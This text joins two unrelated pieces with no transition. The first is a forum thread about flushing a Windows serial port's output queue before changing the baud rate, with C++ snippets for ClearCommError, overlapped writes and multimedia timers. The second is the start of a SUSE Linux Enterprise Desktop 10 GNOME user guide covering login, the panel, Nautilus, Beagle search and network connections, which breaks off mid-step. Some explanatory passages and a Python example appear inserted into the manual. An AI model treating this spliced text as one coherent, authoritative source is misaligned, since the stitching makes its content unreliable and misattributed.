you need to wait until all bytes have been sent ;-)
while (GetOutQueueSize()) Sleep(0);
where
UINT GetOutQueueSize()
{
    COMSTAT Stat;
    DWORD dwErr = 0;
    // Ask the driver how many bytes are still waiting in the output queue.
    if (!ClearCommError(m_hPort, &dwErr, &Stat))
        return 0; // query failed; treat the queue as empty
    return Stat.cbOutQue;
}
I tried the method you suggested, but the result is the same. It is like a double check that proves the buffer is empty, and indeed it is empty, although the physical layer has not finished transmitting yet. Therefore, when I change the baud rate after these checks, it cuts off the transmission of the sync break.
I tried working with a loopback in hardware, trying to confirm that each byte was transferred by receiving it back into the receive buffer, but this method was too slow: about 40 bit times.
Another method was implementing a timer, but this is not reliable, as timers have a latency of 10 to 55 ms depending on the PC.
Any idea how to overcome this?
Ronny
Quote from MSDN:
cbOutQue
Specifies the number of bytes of user data remaining to be transmitted for all write operations. This value will be zero for a nonoverlapped write.
This means you need to switch to overlapped I/O in order to get the number of bytes in the buffer.
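To illustrate, here is a minimal sketch of an overlapped write followed by a wait for the output queue to drain. It assumes m_hPort was opened with FILE_FLAG_OVERLAPPED; the function name WriteAndDrain and the trimmed error handling are mine, not from MSDN:

```cpp
#include <windows.h>

// Sketch only: assumes m_hPort was opened with
// CreateFile(..., FILE_FLAG_OVERLAPPED, ...).
bool WriteAndDrain(HANDLE m_hPort, const BYTE* data, DWORD len)
{
    OVERLAPPED ov = {0};
    ov.hEvent = CreateEvent(NULL, TRUE, FALSE, NULL); // manual-reset event

    DWORD written = 0;
    if (!WriteFile(m_hPort, data, len, &written, &ov)) {
        if (GetLastError() != ERROR_IO_PENDING) {
            CloseHandle(ov.hEvent);
            return false;
        }
        // Block until the driver has accepted all bytes of this write.
        GetOverlappedResult(m_hPort, &ov, &written, TRUE);
    }
    CloseHandle(ov.hEvent);

    // With overlapped I/O, cbOutQue reports bytes still queued in the driver.
    COMSTAT stat;
    DWORD err = 0;
    do {
        ClearCommError(m_hPort, &err, &stat);
        Sleep(0);
    } while (stat.cbOutQue != 0);
    return true;
}
```

Note that even cbOutQue == 0 only means the driver's queue is empty; the last byte may still be sitting in the UART's shift register, so a short guard delay before changing the baud rate may still be needed.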
I looked in MSDN at a technical article on completion I/O. It says that overlapped operations can signal completion just as nonoverlapped ones do. I tried that too, but it is no better.
It seems that I should find a way to get a shorter latency with timers. I need a latency shorter than 2 milliseconds.
Any idea how I can achieve that?
Thanks, Ronny
You can use high-resolution (multimedia) timers;
see timeSetEvent in MSDN.
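For reference, a sketch of a 1 ms periodic multimedia timer built on timeSetEvent; this is my illustration of the suggestion, assuming a classic Win32 build linked against winmm.lib:

```cpp
#include <windows.h>
#include <mmsystem.h>
#pragma comment(lib, "winmm.lib")

volatile LONG g_ticks = 0;

// Called on a multimedia-timer thread roughly every millisecond.
void CALLBACK TimerProc(UINT uTimerID, UINT uMsg, DWORD_PTR dwUser,
                        DWORD_PTR dw1, DWORD_PTR dw2)
{
    InterlockedIncrement(&g_ticks);
}

int main()
{
    timeBeginPeriod(1);  // request 1 ms timer resolution
    UINT id = timeSetEvent(1, 0, TimerProc, 0, TIME_PERIODIC);

    Sleep(100);          // do other work; ticks accumulate in the background

    timeKillEvent(id);
    timeEndPeriod(1);
    return 0;
}
```

Unlike WM_TIMER, whose granularity is tied to the system tick (the 10 to 55 ms Ronny measured), timeSetEvent can deliver callbacks at roughly 1 ms resolution, well under the 2 ms requirement.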
DarthMod
Community Support Moderator
SUSE Linux Enterprise Desktop 10
GNOME USER GUIDE
July 17, 2006
novdocx (ENU) 01 February 2006

© 2004-2006 Novell, Inc. All rights reserved. Permission is granted to copy, distribute, and/or modify this document under the terms of the GNU Free Documentation License (GFDL). A copy of the GFDL can be found at. THIS DOCUMENT AND MODIFIED VERSIONS OF THIS DOCUMENT ARE PROVIDED UNDER THE TERMS OF THE GNU FREE DOCUMENTATION LICENSE WITH THE FURTHER UNDERSTANDING THAT: 1. THE DOCUMENT IS PROVIDED ON AN “AS IS” BASIS, WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, WITHOUT LIMITATION, WARRANTIES THAT THE DOCUMENT OR MODIFIED VERSION OF THE DOCUMENT IS FREE OF DEFECTS, MERCHANTABLE, FIT FOR A PARTICULAR PURPOSE, OR NON-INFRINGING. THE ENTIRE RISK AS TO THE QUALITY, ACCURACY, AND PERFORMANCE OF THE DOCUMENT OR MODIFIED VERSION OF THE DOCUMENT IS WITH YOU. SHOULD ANY DOCUMENT OR MODIFIED VERSION PROVE DEFECTIVE IN ANY RESPECT, YOU (NOT THE INITIAL WRITER, AUTHOR OR ANY CONTRIBUTOR) ASSUME THE COST OF ANY NECESSARY SERVICING, REPAIR OR CORRECTION. THIS DISCLAIMER OF WARRANTY CONSTITUTES AN ESSENTIAL PART OF THIS LICENSE. NO USE OF ANY DOCUMENT OR MODIFIED VERSION OF THE DOCUMENT IS AUTHORIZED HEREUNDER EXCEPT UNDER THIS DISCLAIMER; AND 2. UNDER NO CIRCUMSTANCES AND UNDER NO LEGAL THEORY, WHETHER IN TORT (INCLUDING NEGLIGENCE), CONTRACT, OR OTHERWISE, SHALL THE AUTHOR, INITIAL WRITER, ANY CONTRIBUTOR, OR ANY DISTRIBUTOR OF THE DOCUMENT OR MODIFIED VERSION OF THE DOCUMENT, OR ANY SUPPLIER OF ANY OF SUCH PARTIES, BE LIABLE TO ANY PERSON FOR ANY DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES OF ANY CHARACTER INCLUDING, WITHOUT LIMITATION, DAMAGES FOR LOSS OF GOODWILL, WORK STOPPAGE, COMPUTER FAILURE OR MALFUNCTION, OR ANY AND ALL OTHER DAMAGES OR LOSSES ARISING OUT OF OR RELATING TO USE OF THE DOCUMENT AND MODIFIED VERSIONS OF THE DOCUMENT, EVEN IF SUCH PARTY SHALL HAVE BEEN INFORMED OF THE POSSIBILITY OF SUCH DAMAGES.
Novell, Inc. 404 Wyman Street, Suite 500 Waltham, MA 02451 U.S.A. Online Documentation: To access the online documentation for this and other Novell products, and to get updates, see.
Novell Trademarks
For Novell trademarks, see the Novell Trademark and Service Mark list ( trademarks/tmlist.html).
Third-Party Materials
All third-party trademarks are the property of their respective owners. Parts of this manual are copyright © 2003-2004 Sun Microsystems.
Contents
About This Guide 11

Part I GNOME Desktop 13

1 Getting Started with the GNOME Desktop 15
1.1 Starting SLED 15
1.1.1 What Is a Session? 15
1.1.2 Switching Desktops 16
1.1.3 Locking Your Screen 16
1.2 Logging Out 16
1.3 Desktop Basics 17
1.3.1 Default Desktop Icons 17
1.3.2 Desktop Menu 18
1.3.3 Bottom Panel 18
1.3.4 Adding Applets and Applications to the Panel 19
1.3.5 Main Menu 20
1.4 Accessing Folders and Files 20
1.4.1 Managing Folders and Files with Nautilus File Manager 20
1.4.2 Accessing Floppy Disks, CDs, or DVDs 22
1.4.3 Finding Files on Your Computer 23
1.4.4 Accessing Files on the Network 25
1.5 Opening or Creating Documents with OpenOffice.org 29
1.6 Exploring the Internet 29
1.7 E-Mail and Calendaring 29
1.8 Moving Text between Applications 29
1.9 Other Useful Programs 30
1.10 Obtaining Software Updates 30

2 Customizing Your Settings 31
2.1 Hardware 32
2.1.1 Configuring Bluetooth Services 32
2.1.2 Configuring Your Graphics Card and Monitor 32
2.1.3 Modifying Keyboard Preferences 32
2.1.4 Configuring the Mouse 36
2.1.5 Installing and Configuring Printers 38
2.1.6 Configuring Removable Drives and Media 39
2.1.7 Configuring a Scanner 39
2.1.8 Specifying Screen Resolution Settings 40
2.2 Look and Feel 40
2.2.1 Changing the Desktop Background 41
2.2.2 Configuring Fonts 42
2.2.3 Configuring the Screen Saver 43
2.2.4 Choosing a Theme 44
2.2.5 Customizing Window Behavior 46
2.3 Personal 47
2.3.1 Configuring Keyboard Accessibility Settings 47
2.3.2 Configuring Assistive Technology Support 49
2.3.3 Changing Your Password 50
2.3.4 Configuring Language Settings 50
2.3.5 Customizing Keyboard Shortcuts 51
2.4 System 51
2.4.1 Configuring Search with Beagle Settings 52
2.4.2 Configuring Date and Time 52
2.4.3 Configuring Network Proxies 52
2.4.4 Configuring Power Management 53
2.4.5 Setting Preferred Applications 54
2.4.6 Setting Session Sharing Preferences 55
2.4.7 Managing Sessions 56
2.4.8 Setting Sound Preferences 59
2.4.9 Managing Users and Groups 61

Part II Office and Collaboration 63

3 The OpenOffice.org Office Suite 65
3.1 Understanding OpenOffice.org 65
3.1.1 What’s New in OpenOffice.org 2.0 66
3.1.2 Enhancements in the Novell Edition of OpenOffice.org 2.0 66
3.1.3 Using the Standard Edition of OpenOffice.org 67
3.1.4 Compatibility with Other Office Applications 67
3.1.5 Starting OpenOffice.org 69
3.1.6 Improving OpenOffice.org Load Time 69
3.1.7 Customizing OpenOffice.org 69
3.1.8 Finding Templates 72
3.2 Word Processing with Writer 72
3.2.1 Creating a New Document 73
3.2.2 Sharing Documents with Other Word Processors 73
3.2.3 Formatting with Styles 74
3.2.4 Using Templates to Format Documents 76
3.2.5 Working with Large Documents 76
3.2.6 Using Writer as an HTML Editor 78
3.3 Using Spreadsheets with Calc 78
3.3.1 Using Formatting and Styles in Calc 79
3.3.2 Using Templates in Calc 79
3.4 Using Presentations with Impress 80
3.4.1 Creating a Presentation 80
3.4.2 Using Master Pages 80
3.5 Using Databases with Base 81
3.5.1 Creating a Database Using Predefined Options 81
3.6 Creating Graphics with Draw 83
3.7 Creating Mathematical Formulas with Math 84
3.8 Finding Help and Information About OpenOffice.org 84

4 Evolution: E-Mail and Calendaring 85
4.1 Starting Evolution for the First Time 85
4.1.1 Using the First-Run Assistant 85
4.2 Using Evolution: An Overview 93
4.2.1 The Menu Bar 94
4.2.2 The Shortcut Bar 94
4.2.3 E-Mail 95
4.2.4 The Calendar 96
4.2.5 The Contacts Tool 96

5 GroupWise Linux Client: E-Mailing and Calendaring 99
5.1 Getting Acquainted with the Main GroupWise Window 99
5.1.1 Toolbar 100
5.1.2 Folder and Item List Header 100
5.1.3 Folder List 101
5.1.4 Item List 104
5.1.5 QuickViewer 104
5.2 Using Different GroupWise Modes 104
5.2.1 Online Mode 104
5.2.2 Caching Mode 104
5.3 Understanding Your Mailbox 105
5.3.1 Bolded Items in Your Mailbox 105
5.3.2 Icons Appearing Next to Items in Your Mailbox and Calendar 105
5.4 Using the Toolbar 107
5.5 Using Shortcut Keys 107
5.6 Learning More 109
5.6.1 Online Help 109
5.6.2 GroupWise 7 Documentation Web Page 109
5.6.3 GroupWise Cool Solutions Web Community 109

6 Instant Messaging with Gaim 111
6.1 Supported Protocols 111
6.2 Setting Up an Account 111
6.3 Managing Your Buddy List 112
6.3.1 Displaying Buddies in the Buddy List 112
6.3.2 Adding a Buddy 112
6.3.3 Removing a Buddy 112
6.4 Chatting 112

7 Using Voice over IP 113
7.1 Configuring Linphone 113
7.1.1 Determining the Run Mode of Linphone 113
7.1.2 Determining the Connection Type 113
7.1.3 Configuring the Network Parameters 114
7.1.4 Configuring the Sound Device 115
7.1.5 Configuring the SIP Options 115
7.1.6 Configuring the Audio Codecs 116
7.2 Testing Linphone 116
7.3 Making a Call 116
7.4 Answering a Call 117
7.5 Using the Address Book 117
7.6 Troubleshooting 118
7.7 Glossary 119
7.8 For More Information 119

8 Managing Printers 121
8.1 Installing a Printer 121
8.1.1 Installing a Network Printer 121
8.1.2 Installing a Local Printer 121
8.2 Modifying Printer Settings 122
8.3 Canceling Print Jobs 122
8.4 Deleting a Printer 122

Part III Internet 123

9 Browsing with Firefox 125
9.1 Navigating Web Sites 125
9.1.1 Tabbed Browsing 126
9.1.2 Using the Sidebar 126
9.2 Finding Information 126
9.2.1 Finding Information on the Web 126
9.2.2 Installing a Different Search Engine 126
9.2.3 Searching in the Current Page 126
9.3 Managing Bookmarks 127
9.3.1 Using the Bookmark Manager 127
9.3.2 Importing Bookmarks from Other Browsers 128
9.3.3 Live Bookmarks 128
9.4 Using the Download Manager 128
9.5 Customizing Firefox 128
9.5.1 Extensions 129
9.5.2 Changing Themes 129
9.5.3 Adding Smart Keywords to Your Online Searches 130
9.6 Printing from Firefox 131
9.7 For More Information 131

Part IV Multimedia 133

10 Manipulating Graphics with The GIMP 135
10.1 Graphics Formats 135
10.2 Starting GIMP 135
10.2.1 Initial Configuration 135
10.2.2 The Default Windows 135
10.3 Getting Started in GIMP 136
10.3.1 Creating a New Image 136
10.3.2 Opening an Existing Image 137
10.3.3 Scanning an Image 137
10.3.4 The Image Window 137
10.4 Saving Images 138
10.5 Printing Images 139
10.6 For More Information 139

11 Using Digital Cameras with Linux 141
11.1 Downloading Pictures from Your Camera 143
11.2 Getting Information 143
11.3 Managing Tags 144
11.4 Search and Find 144
11.5 Exporting Image Collections 144
11.6 Basic Image Processing with f-spot 146

12 Playing and Managing Your Music with Helix Banshee 147
12.1 Managing Your Library 148
12.1.1 Playing Your Music 148
12.1.2 Organizing Your Music 148
12.1.3 Importing Music 148
12.2 Using Helix Banshee with Your iPod 149
12.3 Creating Audio and MP3 CDs 150
12.4 Configuring Preferences 150

13 Burning CDs and DVDs 151

Part V Appendixes 153

A Getting to Know Linux Software 155
A.1 Office 155
A.2 Network 158
A.3 Multimedia 161
A.4 Graphics 165
A.5 System and File Management 167
A.6 Software Development 170
About This Guide
Congratulations on choosing the SUSE® Linux* Enterprise Desktop (SLED). This manual is designed to introduce you to the GNOME graphical desktop environment and is organized as follows:

• Part I, “GNOME Desktop,” on page 13
• Part II, “Office and Collaboration,” on page 63
• Part III, “Internet,” on page 123
• Part IV, “Multimedia,” on page 133
• Part V, “Appendixes,” on page 153

Audience

This guide is intended for SLED users using the GNOME desktop.

Feedback

We want to hear your comments and suggestions about this manual and the other documentation included with this product. Please use the User Comments feature at the bottom of each page of the online documentation, or go to and enter your comments there.

Documentation Updates

For the latest version of this documentation, see the SUSE Linux Enterprise Desktop documentation () Web site.

Additional Documentation

().
Documentation Conventions In Novell documentation, a greater-than symbol (>) is used to separate actions within a step and items in a cross-reference path. A trademark symbol (®, TM, etc.) denotes a Novell trademark. An asterisk (*) denotes a third-party trademark.
Part I GNOME Desktop
1 Getting Started with the GNOME Desktop
This chapter assists you in becoming familiar with the conventions, layout, and common tasks of SUSE® Linux Enterprise Desktop (SLED) with the GNOME desktop. If you have not yet installed SLED, see the SUSE Linux Enterprise Desktop Quick Start ( nld/qsnld/data/brmch9i.html).

• Section 1.1, “Starting SLED,” on page 15
• Section 1.2, “Logging Out,” on page 16
• Section 1.3, “Desktop Basics,” on page 17
• Section 1.4, “Accessing Folders and Files,” on page 20
• Section 1.5, “Opening or Creating Documents with OpenOffice.org,” on page 29
• Section 1.6, “Exploring the Internet,” on page 29
• Section 1.7, “E-Mail and Calendaring,” on page 29
• Section 1.8, “Moving Text between Applications,” on page 29
• Section 1.9, “Other Useful Programs,” on page 30
• Section 1.10, “Obtaining Software Updates,” on page 30
1.1 Starting SLED
When you start SLED, you are prompted to enter your username and password. This is the username and password you created when you installed SLED. If you did not install SLED, check with your system administrator for the username and password.

The login screen has three menu items:

• Login Prompt: Enter your username and password to log in.
• Session: Specify the desktop to run during your session. If other desktops are installed, they appear in the list.
• Actions: Perform a system action, such as shutting down the computer, rebooting the computer, or configuring the Login Manager.

• Section 1.1.1, “What Is a Session?,” on page 15
• Section 1.1.2, “Switching Desktops,” on page 16
• Section 1.1.3, “Locking Your Screen,” on page 16
1.1.1 What Is a Session?
A session is the period of time from when you log in to when you log out. The login screen offers several login options. For example, you can select the language of your session so that text that appears in the SLED interface is presented in that language.
After your username and password are authenticated, the Session Manager starts. The Session Manager lets you save certain settings for each session. It also lets you save the state of your most recent session and return to that session the next time you log in.

The Session Manager can save and restore the following settings:
• Appearance and behavior settings, such as fonts, colors, and mouse settings.
• Applications that you were running, such as a file manager or an OpenOffice.org program.

TIP: You cannot save and restore applications that Session Manager does not manage. For example, if you start the vi editor from the command line in a terminal window, Session Manager cannot restore your editing session.

For information on configuring session preferences, see “Managing Sessions” on page 56.
1.1.2 Switching Desktops
If you installed both the GNOME and the KDE desktops, use the following instructions to switch desktops.
1 Click Computer > Logout > OK. In KDE, click N > Logout > Logout.
2 On the SUSE Linux Enterprise Desktop login screen, click Session.
3 Select the desktop you want (GNOME or KDE), then click OK.
4 Type your username, then press Enter.
5 Type your password, then press Enter.
1.1.3 Locking Your Screen
To lock the screen, you can do either of the following:
• Click Computer > Lock Screen.
• If the Lock button is present on a panel, click it. To add the Lock button to a panel, right-click the panel and then click Add to Panel > Actions > Lock.

When you lock your screen, the screen saver starts. To lock your screen correctly, you must have a screen saver enabled. To unlock the screen, move your mouse to display the locked screen dialog. Enter your username and password, then press Enter.

For information on configuring your screen saver, see “Configuring the Screen Saver” on page 43.
1.2 Logging Out
When you are finished using the computer, click Computer > Logout. Then select one of the following:
• Log out: Logs you out of the current session and returns you to the Login dialog.
• Shut down: Logs you out of the current session, then turns off the computer.
• Restart the computer: Logs you out of the current session, then restarts the computer.
• Suspend the computer: Saves the current memory contents to disk and shuts down the computer. When you restart, the saved memory content is loaded and you can resume where you left off.
1.3 Desktop Basics
As with other common desktop products, the main components of the GNOME desktop are icons that link to files, folders, or programs, as well as the panel at the bottom of the screen (similar to the Task Bar in Windows). Double-click an icon to start its associated program. Right-click an icon to access additional menus and options. You can also right-click any empty space on the desktop to access additional menus for configuring or managing the desktop itself. For more information about using Nautilus, see “Managing Folders and Files with Nautilus File Manager” on page 20.

Right-clicking an icon displays a menu offering file operations, like copying, cutting, or renaming. Selecting Properties from the menu displays a configuration dialog. The title of an icon as well as the icon itself can be changed with Select Custom Icon. The Emblems tab lets you add graphical descriptive symbols to the icon. The Permissions tab lets you set access permissions for the selected files. The Notes tab lets you manage comments. The menu for the trash can additionally features the Empty Trash option, which deletes its contents.

A link is a special type of file that points to another file or folder. When you perform an action on a link, the action is performed on the file or folder the link points to. When you delete a link, you delete only the link file, not the file that the link points to. To create a link on the desktop to a folder or a file, access the object in question in File Manager by right-clicking the object and then clicking Make Link. Drag the link from the File Manager window and drop it onto the desktop.

• Section 1.3.1, “Default Desktop Icons,” on page 17
• Section 1.3.2, “Desktop Menu,” on page 18
• Section 1.3.3, “Bottom Panel,” on page 18
• Section 1.3.4, “Adding Applets and Applications to the Panel,” on page 19
• Section 1.3.5, “Main Menu,” on page 20
1.3.1 Default Desktop Icons
To remove an icon from the desktop, simply drag it onto the trash can. However, be careful with this option—if you move folder or file icons to the trash can, the actual data is deleted. If the icons only represent links to a file or to a directory, only the links are deleted.
NOTE: You cannot move the Home icon to the trash.
1.3.2 Desktop Menu
Right-clicking an empty spot on the desktop displays a menu with various options. Click Create Folder to create a new folder. Create a launcher icon for an application with Create Launcher. Provide the name of the application and the command for starting it, then select an icon to represent it. You can also change the desktop background and align desktop icons.
1.3.3 Bottom Panel
The desktop includes a panel across the bottom of the screen. The bottom panel contains the Computer menu (similar to the Start menu in Windows) and the icons of all applications currently running. You can also add applications and applets to the panel for easy access. If you click the name of a program in the taskbar, the program's window is moved to the foreground. If the program is already in the foreground, a mouse click minimizes it. Clicking a minimized application reopens the respective window.
Figure 1-1 GNOME Bottom Panel
The Show Desktop icon is on the right side of the bottom panel. This icon minimizes all program windows and displays the desktop. Or, if all windows are already minimized, it opens them up again. If you right-click an empty spot in the panel, a menu opens, offering the options listed in the following table:
Table 1-1 Panel Menu Options
Add to Panel: Opens a menu list of applications and applets that can be added to the panel.
Properties: Modifies the properties for this panel.
Delete This Panel: Removes the panel from the desktop. All of the panel settings are lost.
Allow Panel to be Moved: Locks the panel in its current position (so that it can’t be moved to another location on the desktop) or unlocks it (so that it can be moved). To move the panel to another location, middle-click and hold any vacant space on the panel, then drag the panel to the location you want.
New Panel: Creates a new panel and adds it to the desktop.
Help: Opens the Help Center.
About Panels: Opens information about the panel application.
1.3.4 Adding Applets and Applications to the Panel
You can add applications and applets to the bottom panel for quick access. An applet is a small program, while an application is usually a more robust stand-alone program. Adding an applet puts useful utilities where you can easily access them. The GNOME desktop comes with many applets. You can see a complete list by right-clicking the bottom panel and selecting Add to Panel. Some useful applets include the following:
Table 1-2 Some Useful Applets
Command Line: Enter commands in a small entry field.
Dictionary Lookup: Look up a word in an online dictionary.
Force Quit: Terminate an application. This is especially useful if you want to terminate an application that is no longer responding.
Search for Files: Find files, folders, and documents on the computer.
Sticky Notes: Create, display, and manage sticky notes on your desktop.
Stock Ticker: Display continuously updated stock quotes.
Traditional Main Menu: Access programs from a menu like the one in previous versions of GNOME. This is especially useful for people who are used to earlier versions of GNOME.
Volume Control: Increase or decrease the sound volume.
Weather Report: Display current weather information for a specified city.
Workspace Switcher: Access additional work areas, called workspaces, through virtual desktops. For example, you can open applications in different workspaces and use them on their own desktops without the clutter from other applications.
1.3.5 Main Menu
Open the main menu by clicking Computer on the far left of the bottom panel. Commonly used applications appear in the main menu. A search field lets you quickly search for applications and files. Access additional applications, listed in categories, by clicking More Applications.
Figure 1-2 Main Menu
1.4 Accessing Folders and Files
SUSE Linux Enterprise Desktop enables you to access folders and files on your computer and on a network.
• Section 1.4.1, “Managing Folders and Files with Nautilus File Manager,” on page 20
• Section 1.4.2, “Accessing Floppy Disks, CDs, or DVDs,” on page 22
• Section 1.4.3, “Finding Files on Your Computer,” on page 23
• Section 1.4.4, “Accessing Files on the Network,” on page 25
1.4.1 Managing Folders and Files with Nautilus File Manager
Use the Nautilus File Manager to create and view folders and documents, run scripts, and create CDs of your data. In addition, Nautilus provides support for Web and file viewing. You can open Nautilus in the following ways:
• Click Computer > Nautilus.
• Click your Home directory icon on the desktop.
Figure 1-3 Nautilus File Manager
You can change to the browser mode by right-clicking the folder and then clicking Browse Folder. This gives you a familiar view with a location window that shows the current path and buttons for common functions. This applies to the current Nautilus window.
Figure 1-4 Nautilus File Manager in Browser Mode
You can change the preferences for files and folders in Nautilus by clicking Edit > Preferences > Behavior, then selecting from the following options:
Table 1-3 Nautilus Options
Single Click to Activate Item: Performs the default action for an item when you click the item. If this option is selected and you point to an item, the title of the item is underlined.
Double Click to Activate Items: Performs the default action for an item when you double-click the item.
Always Open in Browser Windows: Opens Nautilus in Browser mode whenever you open it.
Run Executable Files When They Are Clicked: Runs an executable file when you click the file. An executable file is a text file that can execute (that is, a shell script).
View Executable Files When They Are Clicked: Displays the contents of an executable file when you click the file.
Ask Each Time: Displays a dialog when you click an executable file. The dialog asks whether you want to execute the file or display the file.
Ask Before Emptying Trash or Deleting Files: Displays a confirmation message before the Trash is emptied or before files are deleted.
Include a Delete Command That Bypasses Trash: Adds a Delete menu item to the Edit menu and the pop-up menu that is displayed when you right-click a file, folder, or desktop object. When you select an item and then click Delete, the item is immediately deleted from your file system.
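As a concrete illustration of the “executable text file” mentioned above, a script is simply a text file whose first line names its interpreter and which has been marked executable. The file name below is hypothetical, and Python is used here only as an example interpreter; a shell script works the same way:

```python
#!/usr/bin/env python
# hello.py -- a minimal executable text file (hypothetical example).
# Make it executable with: chmod +x hello.py
# Whether clicking it in Nautilus runs it, displays it, or asks first
# depends on the Behavior preference selected above.

message = "Hello from an executable text file"
print(message)
```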
Some simple shortcuts for navigating include the following:
Table 1-4 Nautilus Navigation Shortcuts
Backspace or Alt+Up-arrow: Opens the parent folder.
Up or Down: Selects an item.
Alt+Down or Enter: Opens an item.
Shift+Alt+Down: Opens an item and closes the current folder.
Shift+Alt+Up: Opens the parent folder and closes the current folder.
Shift+Ctrl+W: Closes all parent folders.
Ctrl+L: Opens a location by specifying a path or URL.
Alt+Home: Opens your home directory.
For more information, click Help > Contents in Nautilus.
1.4.2 Accessing Floppy Disks, CDs, or DVDs
To access floppy disks, CDs, or DVDs, insert the medium into the appropriate drive. For several types of removable media, a Nautilus window pops up automatically when the media is inserted or attached to the computer. If Nautilus does not open, double-click the icon for that drive to view the contents.
WARNING: Do not simply remove floppy disks from the drive after using them. Floppy disks, CDs, and DVDs must always be unmounted from the system first. Close all File Manager sessions still accessing the medium, then right-click the icon for the medium and select Eject from the menu. Then safely remove the floppy disk or CD when the tray opens automatically.

Floppy disks can also be formatted by clicking Computer > More Applications > System > Floppy Formatter. In the Floppy Formatter dialog, select the density of the floppy disk and the file system settings: Linux native (ext2), the file system for Linux, or DOS (FAT) to use the floppy with Windows systems.
1.4.3 Finding Files on Your Computer
To locate files on your computer, click Computer, enter your search terms in the Search field, then press Enter. The results are displayed in the Desktop Search dialog box.
Figure 1-5 Desktop Search Dialog Box
You can use the results lists to open a file, forward it via e-mail, or display it in the file manager. Simply right-click an item in the results list and select the option you want. The options available for an item in the results list depend on the type of file it is. Clicking a file in the list displays a preview of the file and information such as the title, path, and when the file was last modified or accessed. Use the Search menu to limit your search to files in a specific location, such as your address book or Web pages, or to display only a specific type of file in your results list. The Sort menu lets you sort the items in your results list according to name, relevance, or the date the file was last modified. You can also access Desktop Search by clicking Computer > More Applications > System > Beagle Search Tool, pressing F12, or clicking on the bottom panel.
Search Tips

• You can use both upper and lowercase letters in search terms. Searches are not case sensitive by default. To perform a case-sensitive search, put double quotation marks (“) around the word you want to match exactly. For example, if you use “APPLE” in a search, apple would be ignored.
• To search for optional terms, use OR (for example, apples OR oranges).

IMPORTANT: The OR is case-sensitive when used to indicate optional search terms.

• To exclude search terms, use a minus sign (-) in front of the term you want to exclude (for example, apples -oranges would find results containing apples but not oranges).
• To search for an exact phrase or word, put quotation marks (“) around the phrase or word.
• Common words such as “a,” “the,” and “is” are ignored.
• The base form of a search term is used when searching (for example, a search for “driving” will match “drive,” “drives,” and “driven”).

Performing a Property Search

By default, the Beagle search tool looks for search terms in the text of documents and in their properties. To search for a word in a particular property, use property_keyword:query. For example, author:john searches for files that have “john” listed in the Author property.
Table 1-5 Supported Property Keywords
album: Album of the media
artist: Artist
author: Author of the content
comment: User comments
creator: Creator of the content
extension or ext: File extension (for example, extension:jpeg or ext:mp3). Use extension: or ext: to search in files with no extension.
mailfrom: E-mail sender name
mailfromaddr: E-mail sender address
mailinglist: Mailing list ID
mailto: E-mail recipient name
mailtoaddr: E-mail recipient address
tag: F-Spot and Digikam image tags
title: Title
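To make the query semantics described in this section concrete, the following toy Python sketch (an illustration only, not Beagle's actual implementation) models plain terms, OR alternatives, minus-sign exclusions, and property:value filters. The document records and field values are invented for the example:

```python
# Toy model of the Beagle query rules described above -- illustrative only.
# It covers plain terms (case-insensitive), "a OR b" alternatives,
# "-term" exclusions, and "property:value" filters. It does not implement
# quoting, stemming, or stop-word handling.

def matches(query, doc):
    """Return True if doc (a dict with 'text' plus optional properties
    such as 'ext', 'author', 'title') satisfies the query."""
    groups = [g.strip() for g in query.split(" OR ")]  # OR joins alternatives

    def term_ok(term):
        if term.startswith("-"):                 # minus sign excludes a term
            return not term_ok(term[1:])
        if ":" in term:                          # property filter, e.g. author:john
            prop, value = term.split(":", 1)
            return value.lower() in str(doc.get(prop, "")).lower()
        return term.lower() in doc["text"].lower()

    return any(all(term_ok(t) for t in g.split()) for g in groups)

docs = [
    {"text": "apple pie recipe", "ext": "pdf", "author": "john", "title": "Pies"},
    {"text": "apple pie recipe", "ext": "pdf", "author": "john", "title": "Oranges and pies"},
    {"text": "banana bread", "ext": "html", "author": "john", "title": "Bread"},
]

print([d["title"] for d in docs if matches("apple ext:pdf author:john -title:oranges", d)])
# prints ['Pies']
```

Note that a real Beagle query such as apple ext:pdf OR ext:html author:john -title:oranges combines these pieces with its own grouping rules; the sketch deliberately treats OR as joining whole alternative queries rather than reproducing Beagle's exact parsing.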
Property searches follow the rules mentioned in “Search Tips” above. You can use property searches as an exclusion query or an OR query, and phrases can be used as queries. For example, the following line searches for all PDF or HTML documents containing the word “apple” whose author property contains “john” and whose title does not contain the word “oranges”:

apple ext:pdf OR ext:html author:john -title:oranges

Setting Search and Indexing Preferences

Use the Search Preferences dialog box to set search and indexing preferences. To open Search Preferences, click Computer > More Applications > System > Beagle Settings. You can also click Search > Preferences in the Desktop Search dialog box.

On the Search tabbed page, click Start search & indexing services automatically to start the search daemon when you log in (this is selected by default). You can also choose the keystrokes that will display the Desktop Search window by specifying any combination of Ctrl, Alt, and a function key. F12 is the default keystroke.

On the Indexing tabbed page, you can choose to index your home directory (selected by default), to not index your home directory, and to add additional directories to index. Make sure you have rights to the directories you add. You can also specify resources that you don’t want indexed (see “Preventing Files and Directories from Being Indexed” below for more information).

Preventing Files and Directories from Being Indexed

Use the Search Preferences dialog box to specify resources that you don’t want indexed. These resources can include directories, patterns, mail folders, or types of objects.
1 Click Computer > More Applications > System > Beagle Search Tool.
2 Click Search > Preferences.
3 On the Indexing tabbed page, click Add in the Privacy section.
4 Select a resource to exclude from indexing, then specify the path to the resource.
5 Click OK twice.
1.4.4 Accessing Files on the Network
This section helps you access network resources using the following tasks:
• “Connecting to Your Network” on page 25
• “Managing Network Connections” on page 27
• “Accessing Network Shares” on page 27
• “Sharing Directories from Your Computer” on page 28

Connecting to Your Network

There are essentially two ways to connect to a network: wired and wireless connections. To view your network connection status, click Computer. In the Status area of the main menu, the Network Connections icon shows your network connection status. For example, in the following figure, the computer is connected to a wired network using an Ethernet connection.
Figure 1-6 Network Connections Icon in the Main Menu
Click the icon to get information about your connection, such as IP address, gateway address, and similar details.

Connecting to a Wired Connection

1 Make sure that an Ethernet cable is connected to your computer's network interface card.
2 Click the Network Connections icon on the main panel, then click Ethernet: eth0.

After a wired network connection is established, the Network Connections icon changes to show your connection type. A connection to the network is confirmed when Wired is listed next to the Network menu item. You can also confirm connectivity by clicking the Network Connections icon. If connected, the Connection Information window displays your IP address and other details about your connection.

Connecting to a Wireless Connection

1 Make sure that your computer contains a wireless network interface card.
2 Click the Network Connections icon on the main panel, then click Wireless: <device>.

